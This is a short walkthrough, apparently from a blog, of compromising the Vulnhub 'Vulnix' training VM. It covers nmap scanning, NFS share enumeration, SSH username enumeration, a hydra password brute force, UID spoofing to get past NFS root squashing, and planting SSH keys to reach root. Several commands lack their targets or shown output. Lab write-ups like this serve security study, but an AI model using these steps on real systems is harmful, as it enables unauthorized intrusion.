Vulnhub Vulnix Walkthrough

Start scanning the host for open ports with nmap

Nmap –T4 –A –p- –vv

There are a mounted ports where we can check for mounted drives on the host by running showmount –e

Now lets create a mounted folder on our machine and mount it to /tmp

It gave us a Permission denied … googling it came with something called root squashing , so lets try something else like brute forcing ssh, lets first enumerate usernames

Using ssh enumeration with /usr/share/metasploit-framework/data/wordlists/http_default_users.txt for usernames got three hits with root – user – sys

Then brute foce ssh : hydra -l user -P /root/pass/rockyou.txt ssh:// –t 4

Got in and viewing /etc/passwd we can see the user vulnix with his GID and UID, now back to our machine and creating new user vulnix with : adduser –u 2008 vulnix , then generating ssh keys and copying it to /tmp/vulnix/.ssh

Logging to ssh using ssh vulnix@

And running sudo –l give us this :

Then edit the file to look like this

Restart the host (VM) so the changes take place and then follow the steps we did with mounting the vulnix user on our machine to access the root directory :

Cd /tmp

Mkdir root

Mount –t nfs /tmp/root

Cd /tmp/root


Cat trophy.txt

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s